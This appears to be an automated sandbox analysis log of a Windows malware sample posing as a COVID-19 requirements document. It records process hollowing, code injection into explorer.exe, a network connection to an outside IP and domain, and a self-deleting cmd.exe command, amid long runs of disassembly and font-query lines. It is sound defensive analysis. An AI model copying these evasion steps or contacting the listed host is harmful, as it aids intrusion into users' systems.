          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E246A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E3FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E6AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E6AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DDA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DDA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E5FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E61608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DAE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E78F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DBEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DBFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DCF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DDA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DDA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E7070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E7070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DDE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E3FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E3FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DA4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DA4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E3B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DA58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DA9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DDF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DDF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DDF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E23884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E23884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DC0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DC0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E71074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E62073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E74015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E74015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E341E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E269A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DDA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DCC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DCB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DCB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DAB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DAB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DAC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DA9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DA9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DA9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DC4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DDD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DDD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DBAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DBAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DDFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E78A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E5B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E5B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E6EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E34257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DC3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DA5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DAAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\wscript.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 52.58.78.16 80
          Source: C:\Windows\explorer.exeDomain query: www.portablesteamsaunas.com
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeMemory written: C:\Users\user\Desktop\COVID-19-Related Requirements.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeSection loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeSection loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\wscript.exeThread register set: target process: 3440
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeSection unmapped: C:\Windows\SysWOW64\wscript.exe base address: E20000
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess created: C:\Users\user\Desktop\COVID-19-Related Requirements.exe {path}
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess created: C:\Users\user\Desktop\COVID-19-Related Requirements.exe {path}
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess created: C:\Users\user\Desktop\COVID-19-Related Requirements.exe {path}
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\COVID-19-Related Requirements.exe'
          Source: explorer.exe, 00000010.00000002.610856927.0000000004F80000.00000004.00000001.sdmp, wscript.exe, 00000013.00000002.598056801.0000000003630000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000010.00000000.435313818.00000000008B8000.00000004.00000020.sdmp, wscript.exe, 00000013.00000002.598056801.0000000003630000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000010.00000002.598251507.0000000000EE0000.00000002.00000001.sdmp, wscript.exe, 00000013.00000002.598056801.0000000003630000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000010.00000002.598251507.0000000000EE0000.00000002.00000001.sdmp, wscript.exe, 00000013.00000002.598056801.0000000003630000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Users\user\Desktop\COVID-19-Related Requirements.exe VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
